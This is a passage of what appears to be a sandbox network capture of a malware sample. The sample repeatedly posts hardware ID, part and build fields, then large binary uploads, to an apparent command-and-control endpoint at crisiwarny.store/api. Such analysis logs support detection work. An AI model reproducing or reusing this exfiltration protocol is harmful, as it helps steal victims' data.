2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 77 54 77 67 73 72 59 68 43 39 4b 46 57 6e 6f 63 39 71 56 4b 4a 2f 39 54 42 6f 67 72 6f 32 32 4c 52 4a 74 70 34 75 71 4f 44 45 6a 76 45 6e 43 5a 6f 53 39 46 76 70 30 5a 62 32 4c 65 30 67 4e 7a 6f 56 45 79 79 32 58 67 61 73 59 57 6b 53 2b 35 76 4b 42 5a 63 63 45 38 49 4c 4b 32 49 51 76 50 6a 31 4e 67 4e 38 75 43 58 42 37 52 50 44 4b 4d 4c 61 4e 76 34 44 37 42 47 4b 79 70 6f 78 42 49 76 31 39 79 72 65 5a 36 43 64 4f 51 55 47 59 68 69 72 64 68 59 74 34 48 49 34 73 7a 70 32 33 61 53 70 70 70 72 4f 72 37 54 51 47 2f 41 33 4c 74 35 6d 56 48 38 34 4e 55 65 43 48 61 67 46 30 6a 2b 52 4a 6e 74 51 4f 50 4a 73 51 55 6a 6a 69 33 72 72 55 67 63 64 67 58 4e 37 4b 59 48 48 37 76 68 55 63 30 42 4d 75 45 57 47 43 68 55 54 6a 4c 5a 65 41 4b 77 77 47 45 61 66 54 71 70 31 34 Data Ascii: wTwgsrYhC9KFWnoc9qVKJ/9TBogro22LRJtp4uqODEjvEnCZoS9Fvp0Zb2Le0gNzoVEyy2XgasYWkS+5vKBZccE8ILK2IQvPj1NgN8uCXB7RPDKMLaNv4D7BGKypoxBIv19yreZ6CdOQUGYhirdhYt4HI4szp23aSppprOr7TQG/A3Lt5mVH84NUeCHagF0j+RJntQOPJsQUjji3rrUgcdgXN7KYHH7vhUc0BMuEWGChUTjLZeAKwwGEafTqp14

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12840 Host: crisiwarny.store
2024-10-28 01:07:10 UTC	12840	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"62A6772FF474BF706284A343A68B9322--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 01:07:10 UTC	1022	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qjd8gplcts916arumup84vgo69; expires=Thu, 20 Feb 2025 18:53:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B15ameMZ%2BoBvdcCc%2BaANeOV%2B5LSxttBVlpnNkFAYKRMzl%2Bei%2BbEvBGw5zTceuwtvXK3t%2FRdsn8fyEpwVaLzdw%2FtvtLLmr1cc%2Fwkg%2BGT0O7ubjHR0hvxc64Riw9biT7EMJgy2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9707043e8045fa-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&sent=7&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13780&delivery_rate=1620593&cwnd=239&unsent_bytes=0&cid=4857f844125aee2d&ts=609&x=0"
2024-10-28 01:07:10 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 01:07:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:11 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15082 Host: crisiwarny.store
2024-10-28 01:07:11 UTC	15082	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"62A6772FF474BF706284A343A68B9322--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 01:07:12 UTC	1011	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gtllvkmpp4lqhs0ipds2lb4e8d; expires=Thu, 20 Feb 2025 18:53:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMjv2rqvhkRaNBjuBFzDQ1AYwWJLOR5Z0lejVQ1IumBiIlfsYkUbjk0SMgw3wziRq9zs6f3FWhlnOx0W%2Fj%2FiDeuG3xOniRwpxWwLWx6eIUyig61pPve57U%2FT1opm4Zf3XKm0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d97070c883fddb4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16022&delivery_rate=2569653&cwnd=252&unsent_bytes=0&cid=e8f1a6b4f390a2a2&ts=870&x=0"
2024-10-28 01:07:12 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 01:07:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:13 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20572 Host: crisiwarny.store
2024-10-28 01:07:13 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"62A6772FF474BF706284A343A68B9322--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 01:07:13 UTC	5241	OUT	Data Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-28 01:07:14 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t1t4i3chh98qfvb7arn6l308up; expires=Thu, 20 Feb 2025 18:53:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEhO%2Fw0RlXCDCaKhtMf8ipvCr8huEP9%2FPC3a2AnVY8ip90QUnuhaVxjEEDHUYm%2FoI%2F9I3BVwE4uLvI%2Fvtqr69ELtk2Cm0N7w2ebwbLz%2BRfRlJ5LvubnJqZJh2qygWjBtC1bs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d970717384aeadd-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21534&delivery_rate=2358306&cwnd=251&unsent_bytes=0&cid=038c822ab1b4b7ad&ts=832&x=0"
2024-10-28 01:07:14 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 01:07:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:14 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1238 Host: crisiwarny.store
2024-10-28 01:07:14 UTC	1238	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"62A6772FF474BF706284A343A68B9322--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 01:07:15 UTC	1010	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v3eb7635t88jik5li3siud5fth; expires=Thu, 20 Feb 2025 18:53:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MIG24eU06JGnGVulGkMV%2FAnnivmnO2L8kwYYSwMOTPk9a8BqQFxpw3A9f6aq7q6AfK2CK69diDJvdHfp7Ejn32u70rECkdSgIUd8wwUlu4ziasPc%2FSA9mEmBX%2BHYQwVqT%2FfM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9707227a526b6b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2155&delivery_rate=2251944&cwnd=249&unsent_bytes=0&cid=286b219d60c93316&ts=502&x=0"
2024-10-28 01:07:15 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 01:07:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:16 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551275 Host: crisiwarny.store
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"62A6772FF474BF706284A343A68B9322--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: 65 c1 2c 31 ba 87 0e de f4 6d 0c af 99 a6 00 7c 7e cb 17 fc c9 72 67 bd 81 29 9b 5a cc d5 f5 07 e1 b3 52 fd 4d 52 2b ef a6 9a e5 c6 be 19 90 94 66 70 5f 0a 35 14 e1 2d a1 c5 0f bd 16 9a ff d4 f6 8f 61 ac 31 32 56 35 39 08 83 2c 9f 93 99 84 f4 40 48 72 6b 4e db 35 3e 51 74 bf a1 f1 03 e3 f7 21 93 51 64 e5 bb 0e b6 50 9e 01 42 5d e1 ab 51 cb 90 2f 31 3e 21 68 6e b5 70 d5 bd 04 9a 72 2e 78 62 f9 a7 3e f3 7a 43 d3 0c ba 06 9f eb 09 dd 51 ff 81 ef 8b 3d a6 54 8c 4b 0b 0f 28 b1 f7 10 14 08 96 c2 6f 5e 9d b4 4e 14 a0 2c 4d aa 7d 4f 0a 8b ba b0 15 1d 7c 22 72 3f dd eb 4f 99 b2 b6 36 17 54 e8 0a 8e 0c ae 28 32 fa 6e db 23 c1 71 24 f9 30 ce 3f 11 72 77 00 b5 e4 66 08 0e e2 8e 49 8c 52 fc d9 1b 4a 80 76 04 05 fb b8 85 bf f3 1b af 7c a2 09 4e 48 6c bd f0 19 4b 76 68 Data Ascii: e,1m\|~rg)ZRMR+fp_5-a12V59,@HrkN5>Qt!QdPB]Q/1>!hnpr.xb>zCQ=TK(o^N,M}O\|"r?O6T(2n#q$0?rwfIRJv\|NHlKvh
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: 38 70 af 84 0a b0 c2 12 a8 da 7c c3 74 5c 5a 2a f1 44 98 f3 9e a7 c2 ad 59 1a de d9 b1 75 4f d3 63 ea 28 03 92 de 5e 5c 15 25 a1 ab c7 c9 89 a8 b7 92 85 81 e8 4f c3 94 b8 e8 38 0a 6e 77 1b ea f6 2d 51 9f 50 3e 31 8f 14 19 87 08 37 9b 13 58 61 88 ef 2f e3 82 cb c2 8d 28 ff c4 39 c4 8b 00 25 e5 52 fe 85 da 8e 60 84 be e0 6c 6d 06 43 62 6b 55 df 78 46 e9 f7 68 95 f1 58 6d 85 f2 54 6f 82 0a 3e 3b 2e 02 53 ba ed d6 46 ac 67 56 b2 33 06 b3 be 15 a4 9a 2a cc 2d 0a 1e 69 89 64 b9 2f fc c6 09 1f 89 b4 b4 9b c8 a9 68 d3 8e 5b e3 34 b1 dc 0b 9a 66 f8 e6 9a c7 8d af dc 0e 0f 6d ae 1f 59 f7 35 a5 05 88 b6 c9 a5 46 dc ee 5d d5 22 7f f5 25 b6 19 76 84 cb 32 cf d5 e4 21 da 71 13 92 99 d2 3e 82 d5 a7 da b2 d0 5d 21 f1 33 0e 00 43 48 f8 28 1c 0f 93 31 47 5f d8 e8 e6 d2 a0 Data Ascii: 8p\|t\ZDYuOc(^\%O8nw-QP>17Xa/(9%R`lmCbkUxFhXmTo>;.SFgV3-id/h[4fmY5F]"%v2!q>]!3CH(1G_
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: 67 7f f8 7d 49 33 fe ef 9d ad 10 43 2f 3a a8 ef f9 1c ff 8f 10 42 07 98 53 47 7e 46 61 ab 00 0f ce e1 ed 30 80 77 e7 90 c7 d2 9d c9 d9 ff f7 ec f0 53 a0 eb 0c d2 82 61 e4 a6 01 bd 3b fd 2a b0 76 c7 37 b4 f3 81 f8 59 ef 0e 9d be 48 b7 62 b1 97 af d2 03 5a 2c d0 e4 7f 60 0f e1 38 09 78 8f 4b 58 a9 2a 90 3a 2f ca e8 fc f3 84 ce d8 3e 0c 3b 12 6c 8a 71 7e a7 6d 9a f0 80 87 0f 65 1a a9 93 eb 87 23 a8 ff fd f1 9b 52 38 ff 4f 4e 84 18 df cd 24 33 d8 21 10 08 92 19 bf 02 55 19 65 a5 f4 a4 1b a4 0a d4 f4 45 ea 37 01 46 ba 84 38 1a 4e 7e 1c 47 e0 44 97 88 ad fc b6 0a 3f ea d1 c7 fb 15 e7 48 6d dc d5 8c df d3 ac bc 52 a7 95 a5 98 38 92 e4 92 8e 0e ef 33 3d 58 89 66 67 e3 d7 56 1c d7 84 05 76 0b e6 17 90 f5 b0 e2 1d 3f c7 c0 91 66 8a 22 42 b5 d8 3f 69 d5 cf d6 e5 06 Data Ascii: g}I3C/:BSG~Fa0wSa;v7YHbZ,`8xKX:/>;lq~me#R8ON$3!UeE7F8N~GD?HmR83=XfgVv?f"B?i
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: f4 40 b6 5f 1a cb 6a cd e4 ec 25 72 d5 a6 df 9a 3e 1e 3f 71 9c f3 ee fc 1c 9f 14 fe 00 9e 8e e0 55 16 ce f5 6d 78 73 d8 8d 34 24 27 f1 b1 1b e2 4d 93 99 46 1f 14 ea aa 17 47 3a 2b 02 25 7f 9f 51 66 28 88 bc 02 74 3c c7 4f 3b 33 3a ac 43 c3 03 42 5e 72 4c 08 e2 78 03 25 26 b6 f8 06 19 45 0e c5 b1 84 fd 76 c6 11 c8 8f 1d 97 b7 3b 46 4c 2a 30 90 15 da b7 e7 1c cb fd d4 09 2f 31 1d b1 ed 9f cb 27 35 31 f7 e5 42 ef fc 3b 9d e4 3e 33 43 4a 5b 93 dc 4c f4 c6 ef 03 e7 3e 38 35 19 77 1e 04 2f 0f 27 79 f2 71 96 fa 60 6d ed d3 88 56 c4 35 85 60 c3 b4 2f ca fd dd 10 a2 c5 39 75 7c 50 31 f4 f2 bf b7 a0 0a 0b 9f 8b 0b 59 67 5d 02 71 a5 10 83 00 7f 0d c4 58 42 20 75 8e 51 68 93 79 41 42 d7 e8 07 94 59 fb 61 66 73 14 45 de fa d8 fe 78 a6 25 17 61 ee 2f da 95 2c c6 33 1e Data Ascii: @_j%r>?qUmxs4$'MFG:+%Qf(t<O;3:CB^rLx%&Ev;FL*0/1'51B;>3CJ[L>85w/'yq`mV5`/9u\|P1Yg]qXB uQhyABYafsEx%a/,3
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: cf b9 47 a4 08 80 69 5b 6f a9 03 a9 6e 02 29 d4 a1 8d 26 34 3c cc 09 71 3b 9b bf ce 99 ad 4e 28 35 62 77 4b a1 5e 69 b0 da b1 13 3d b0 a2 55 0f bc 66 f8 fb 0a 09 47 00 0b ac e5 3f 04 d6 17 f8 35 f9 c1 11 44 21 05 e8 b4 2d f0 e7 64 d4 92 b4 39 31 ac 8c 0a ae 18 a8 7a e7 ed b3 32 f4 59 6d 6b 9e 3d f6 9f b7 02 47 18 38 87 9d c1 82 58 5e a0 b9 d0 c2 e4 2f fe 73 1c 87 e2 79 a1 65 f7 39 66 c8 fe ab 90 6e 8d 74 ca b4 a0 4a 54 44 6f f6 66 84 bc 2a 42 9a 59 df 7c 92 1c 31 65 2e f8 ae 42 d3 64 40 c7 a3 24 f2 10 79 cd b3 43 6f fe 43 c1 01 13 bf df 38 23 3d ac 04 50 c1 46 99 02 f8 8a b5 3a 1a 8a c5 80 ad a7 d2 3a 2a 20 97 e0 6b a7 09 7d a4 c1 ad 97 21 86 a5 dc 4e 9c 08 83 99 e2 5d b7 67 5e 8c a7 6e 46 c3 27 41 32 41 dd 87 27 33 82 1c 62 e6 aa 38 cc 88 c7 c4 76 1c fb Data Ascii: Gi[on)&4<q;N(5bwK^i=UfG?5D!-d91z2Ymk=G8X^/sye9fntJTDofBY\|1e.Bd@$yCoC8#=PF:: k}!N]g^nF'A2A'3b8v
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: b6 27 21 42 6d 66 c5 5a d7 cf 9c 23 2a 3c 23 e7 e3 8e 6d b7 78 ac 95 27 f0 67 b4 cb 54 15 ba fc df 3e 34 23 46 c3 72 fc 57 71 5a b5 84 8c 3f 7c 7e a7 6b 01 5b 55 02 d5 85 7b 12 a8 f5 e3 84 4d e6 d1 a8 f7 e2 5a e3 e0 5b ea 89 b4 10 89 4c e5 09 84 1d 93 62 1f fe 87 2f 4f 91 45 42 b0 4f 9e 2b fb dd 1f dc 7c 2f bf 66 d6 4e 9b a7 cf 4d ab 2c c1 88 1d 86 7b 3d f9 4e 52 c4 d1 49 2d 14 ed de 56 9b d8 68 d8 6f f4 4d bd e6 78 6f 76 76 5b 09 64 ed 20 c2 4f e1 df 90 c0 5f 75 88 fd 33 48 94 82 f1 88 b7 2d 6d 87 70 6a 0a 27 2f 35 bc 33 46 75 95 15 dd 53 c8 49 d4 1c e7 b8 be 4c c2 5b dd 23 cd 1a fa 61 af 9f 93 a1 25 7a 27 c0 6d a5 2c 81 a9 ce a9 02 7f d4 de 32 d7 41 9b 16 93 3c f3 76 03 84 24 78 1b 9c b8 8c bc b8 ef 45 61 22 8c 27 59 b9 a4 a3 83 e1 5b 2a cc 1c 1f 72 e5 Data Ascii: '!BmfZ#<#mx'gT>4#FrWqZ?\|~k[U{MZ[Lb/OEBO+\|/fNM,{=NRI-VhoMxovv[d O_u3H-mpj'/53FuSIL[#a%z'm,2A<v$xEa"'Y[r
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: ff 3e d1 3f 26 db 06 e5 41 9e 46 b0 c6 5b 63 f5 59 25 42 09 12 fe 85 ac 7f 71 3d a9 5a 09 8d 6d 76 6f 17 2b df 7b ce 21 bd 12 e3 1b 48 20 13 1a ca b4 28 d8 4b 37 08 03 31 da 86 78 a1 86 11 e3 10 df 0e f7 8b 0f b1 97 ea 0c e4 f1 c5 a8 2b e9 84 bb 87 cd 5a bc 2f 3d 20 64 3a f9 b1 7f d3 2d b3 6b 80 5f 14 55 fb df 93 f1 e2 e0 90 e4 a3 dd 7e 83 c2 c5 c0 dd f1 ad 22 98 95 43 4c 90 f2 03 38 be e8 53 5f d4 69 a7 8f 93 be d2 9c 35 45 e9 4b 8d d1 4d 48 d4 40 5a 31 28 1c e2 43 04 28 42 ad 3d fd 16 e1 86 d6 ab 2d 96 52 e7 74 f1 ed 11 b4 00 ef 42 09 f0 14 26 be bb 20 4c ca 7d 84 5d 0c 5a eb 3f 12 63 e8 0f 76 a6 44 fa 9e 37 61 14 be 4b 5d b2 da 39 28 5f 74 b8 01 41 7a 82 86 a5 10 62 32 6f 4f 68 fd 94 f2 38 af bf 0a d9 b0 3e 62 